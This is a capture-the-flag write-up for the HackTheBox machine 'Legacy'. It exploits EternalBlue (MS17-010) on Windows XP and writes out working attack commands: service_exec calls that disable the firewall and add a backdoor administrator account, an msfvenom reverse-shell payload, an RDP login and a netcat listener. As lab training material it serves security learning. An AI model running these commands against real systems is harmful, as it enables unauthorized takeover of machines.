Legacy is one of the easiest boxes from HackTheBox. It is vulnerable to EternalBlue (MS17-010) and is running Windows XP. You can use a public exploit that will provide you with a System Shell.
Started off by running NmapAutomator.
Nmap discovered the following open ports and services:
PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
The automated nmap script discovered a potential vulnerability for EternalBlue:
| smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). |
Method 1: RDP instead of reverse shell
There are several exploits for this, however, you need to ensure that they are targeting Windows XP. This script does. Let’s dive a bit deeper into the script:
smb_send_file(smbConn, lfile, 'C', '/%s' % filename) service_exec(conn, r'cmd /c c:\%s' % filename)
It will send the executable you supply and then execute it. If, for some reason, a reverse shell isn’t working, you can always modify this script to something like this:
service_exec(conn, r'cmd /c netsh advfirewall set allprofiles state off') service_exec(conn, r'cmd /c net user banaan pass /add') service_exec(conn, r'cmd /c net localgroup administrators banaan /add')
This will add a new user and add the user to the administrators group. After this you can run:
xfreerdp /u:banaan +clipboard /v:10.11.1.75:3389
This will give you a RDP session as System.
Method 2: Reverse Shell
Before running the script you need to supply an executable, this was generated with MSFvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o rev.exe
The script can then be run as follows:
python2.7 send_and_execute.py 10.129.5.63 rev.exe
Make sure to have a netcat listener ready on port 4444 and you will receive a system shell.
This was probably one of the easiest boxes from HackTheBox and very straightforward. Hope you enjoyed this writeup!